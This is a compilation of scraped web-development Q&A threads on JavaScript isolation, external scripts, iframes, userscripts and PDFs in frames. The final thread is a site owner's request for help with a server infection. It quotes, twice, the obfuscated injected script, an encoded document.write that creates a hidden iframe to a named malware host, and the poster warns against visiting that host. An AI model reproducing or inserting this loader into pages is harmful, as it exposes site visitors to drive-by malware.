Is there a way to prevent a script from executing outside of an element without using a frame or iframe? I am not talking about the CSP because it is all within the same domain. For example:
<!doctype html>
<html>
<body>
<div id="internal_application_frame">
<div>
</div>
<script> /* internal domain script */
</script>
</div>
</body>
</html>
I want to limit the script inside the "internal_application_frame" to see everything inside of it, however, it should not be able to access anything outside that div. So no access to the window object or anything. Is there a way to do that? If you need more clarification, I will try to word in differently. Thanks in advance.
Related
So, I have this really weird error. I am trying to link to an external JS file from my HTML file. Whatever I do, the functions in that external JS file can not be called.
This is my HTML code:
<html>
<head>
<meta charset="UTF-8">
<script src="cookies.js"></script>
<script type="text/javascript">
//some other JavaScript...
function test() {
extTest();
}
</script>
</head>
<body>
<button type="button" onclick="test();">Test</button>
</body>
</html>
And this is my external JavaScript file:
function extTest() {
alert("Hello world");
}
(I simplified both code blocks to contain only the necessary lines.)
So, whenever I click the button, the function extTest() is supposed to open a popup saying "Hello world". But extTest() is not called. Instead, I get a ReferenceError saying "extTest is not defined". The problem occurs in Firefox as well as Chrome and Edge.
Both files (HTML and JS) are in the same directory on my laptop. I tried linking to the JS file with a relative link (as shown in the code above), a relative link using . for current directory (./cookies.js), and an absolute link (/C:/...). I also tried putting the JS file in its own folder and linking to it, it didn't work.
I'd consider myself rather a beginner when it comes to JavaScript, but I already used external JS files and it worked. Do you guys have any idea where this error comes from? I mean, I could put all the code from the external file into the script in the HTML file, but I'm really curious why it's not working the other way.
Any hints are highly appreciated, thank you in advance.
You can use just like this, you don't need to make another function inside because i suppose you make the js code in cookies.js
<html>
<head>
<meta charset="UTF-8">
<script src="cookies.js"></script>
</head>
<body>
<button type="button" onclick="extTest();">Test</button>
</body>
</html>
I'd say initially it looks like you are declaring your function test but not invoking it. Try putting a line below that just has:
test ();
A question, if you similarly invoke your extTest function at the bottom of your external .js file, by which I mean again putting a line that says
extTest(); does it work as intended? If it doesn't, then there may be another issue at hand.
Hi Please tell me how can we remove any div in iframe for example my code is :
<!DOCTYPE html>
<html>
<head>
</head>
<body>
<iframe src="http://stayupdate.net" width="100%" height="800">
<p>Your browser does not support iframes.</p>
</iframe>
</body>
</html>
I want to remove "creditline" div or its text
<div id="creditline">
<span class=".alignleft">
</span>Designed By
Real Web Maker
</div>
You can change only if you have access(file) to that page..Otherwise its not possible to change the content of other's page.And it should be.
Don't no about your requirement but..But you can do a trick.
Create a same size div,change the content according to you requirement.
and by js or jquery put it exactly over iframe div.
Is not recommended at all,and its not reliable too.
I suppose you want to add script to your page, which removes a div tag inside the iframe. This is only possible if the page shown by the iframe (http://stayupdate.net) has a provision to do that. If you can modify the inner page, then you could add an event listener, which accepts an external command to remove a tag. The outer page can then send that command using postMessage, as described here. If the outer and inner pages are in the same domain, you can use a simple function call as described here.
I wan't to make a userscript that will persist with its instance even if I click on a link.
To make a script instance (ie. variables etc) persist, I need to have the page I'm broswing in iframe, which is a child of the window where script is running. And also, parents document location must be same as the inner document location - otherwise I'd have problems with same origin policy.
That said, I wan't to turn this:
<html>
<head>
...
</head>
<body>
...page contents...
</body>
</html>
into this:
<html>
<head>
...here is my userscript running...
</head>
<body>
<iframe style="width: 100%; height: 100%">
...move the whole original window here...
</iframe>
</body>
</html>
Unles a link has target="_blank/_parent/_top" all browsing activity should happen in the inner iframe, while the parent window shall not be refreshed (which would cause the script lose all variables).
One way to do that would be simply creating an iframe with same url like the url of my site:
var container = document.createElement("iframe");
container.src = window.location;
However, such approach would cause page reload as well as lose of all data (filled forms, scrolling).
So to move the window with all its contents to an iframe. Is that possible?
Perhaps you could get the contents of document.head.outerHTML and document.body.outerHTML, combine them into a string, base64 encode it, then use the result to construct a dataURL, which you then set as the iframe's src.
Though I could see recursion turning the idea into an effect similar to pointing a video camera at a screen showing it's outut.
Interesting question. Bookmarked.
One way by which we can call a pdf inside a frame is by directly seeting the src property..
<frame src="xyz.pdf" .../>
Is there any other way (apart from frame/object/embed) to call the pdf within the frame...something like the frame actually has some html code and within that pdf is called...
I know sounds a bit funny, but is there any way...I need this as I am trying to fix a scrolling issue for pdf within a frame for iPad?
Thank you.
First of all, avoid frames when you can. It's always bad practice.
Here is the source for a very simple HTML page that would redirect to the PDF after one second:
<html>
<head>
<meta http-equiv="refresh" content="1;url=xyz.pdf">
</head>
<body>
</body>
</html>
I don't understand how this would solve your scrolling issue, but it will definitely do what you ask for in your question.
The server that has my website on it also has a virus on it.
The virus injects the malicious code
<b id="BAs"></b><script>/*Warning: Opera Only*/var hKo = document.createElement("script");hKo.text="document.write(unescape(\"%3c%69%66%72%61%6d%65%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%6e%63%63%63%6e%6e%6e%63%2e%63%6e%2f%69%6d%67%2f%69%6e%64%65%78%2e%70%68%70%27%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%3b%27%3e%3c%2f%69%66%72%61%6d%65%3e\"));";document.getElementById("BAs").appendChild(hKo)</script>
onto EVERY single page which is served, and it is being preprocessed by Apache or something similar to add it to the end of the file.
I created a test file, with the following code:
<html>
<head>
<title>Test HTML File</title>
</head>
<body>
<h1>Test HTML File</h1>
</body>
</html>
It isn't pretty, but it served its purpose.
When viewing the page in my browser, I get
<html>
<head>
<title>Test HTML File</title>
</head>
<body>
<h1>Test HTML File</h1>
<b id="BAs"></b><script>/*Warning: Opera Only*/var hKo = document.createElement("script");hKo.text="document.write(unescape(\"%3c%69%66%72%61%6d%65%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%6e%63%63%63%6e%6e%6e%63%2e%63%6e%2f%69%6d%67%2f%69%6e%64%65%78%2e%70%68%70%27%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%3b%27%3e%3c%2f%69%66%72%61%6d%65%3e\"));";document.getElementById("BAs").appendChild(hKo)</script>
</body>
</html>
which can be viewed from www.sagamountain.com/testfile.html (warning, this page is infected)
I need to programmatically stop that div and that script from executing, as it is an iframe to a site with a trojan on it. HTML, CSS, or JS, I just need some way to prevent that JS from executing.
It is already display:none so you cannot see it, but how can I prevent the iframe from ever loading at all?
Thanks for the help! The unescape thing resolves to an iframe to http://ncccnnnc.cn/img/index.php which is clearly the source of my troubles. Don't go to that site!
EDIT: This is a followup to https://serverfault.com/questions/78439/my-website-is-infected-i-restored-a-backup-of-the-uninfected-files-how-long-wil/78459#78459
I'm sorry that I can't answer your specific question, but I think that you're looking at this the wrong way. What you need to do is not strip out the virus-inserted html, what you need to do is talk to your web-host/sysadmin and strip out the virus.
Treating the symptoms won't cure the infection. Treating the disease, however, will also treat the symptoms as well as removing the virus.
The file that is in your server is a php file look in the comments here.
Cyber, if you have to wait on the server to be fixed by someone else, I'd say you should try ending your documents with an open <noscript> tag or open HTML comment tag.
You can't use Javascript to stop content that hasn't been rendered from doing so, unless you use document.write and one of the above tags (noscript/comment). Also you can't do anything by placing a script after, as it is already too late (the content is there already).
It is an ugly solution but should prevent your site visitors from experiencing the virus. It also makes your markup invalid, but any browser should be able to parse it and render it as you expect.
Best of luck with the server!